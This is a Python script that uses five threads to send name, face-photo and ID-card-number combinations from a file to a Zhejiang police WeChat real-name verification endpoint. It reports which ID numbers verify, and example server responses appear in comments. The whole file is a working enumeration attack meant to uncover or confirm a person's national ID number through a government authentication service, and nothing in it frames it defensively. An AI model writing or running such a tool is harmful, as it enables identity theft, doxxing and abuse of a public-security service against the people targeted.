import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
url = "https://zjcallpolice.gat.zj.gov.cn/newhlwbj-zjipst//wx/kx/two/auth2"
headers = {
    'User-Agent': "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.56(0x1800382e) NetType/WIFI Language/zh_CN",
    'Accept-Encoding': "gzip,compress,br,deflate",
    'uid': "替换",
    'content-type': "application/json",
    'token': "替换",
    'Referer': "https://servicewechat.com/wx0d7901cc76c91382/23/page-frame.html"
}
real_name = input("请输入姓名: ")
pic_data_url = input("请输入图片链接: ")
with open('提取.txt', 'r') as file:
    id_numbers = file.read().splitlines()
def send_request(id_number):
    params = {
        'uid': "替换",
        'sfzhm': id_number,
        'xm': real_name,
        'picDataUrl': pic_data_url
    }
    response = requests.get(url, params=params, headers=headers)
    return response.json(), id_number
with ThreadPoolExecutor(max_workers=5) as executor:
    futures = [executor.submit(send_request, id_number) for id_number in id_numbers]
    for future in as_completed(futures):
        result, id_number = future.result()
        if result['code'] == 200:
            print(f"{id_number} 核验成功✅")
        elif result['code'] == 500:
            print(f"错误❌{id_number}:{result['msg']}")

#{"code":500,"msg":"认证失败","data":null}

#{"code":500,"msg":"微信可信认证失败","data":null}

#{"code":500,"msg":"人像图片大于30K","data":null}

#{"code":200,"msg":"微信可信认证成功","data":null} 
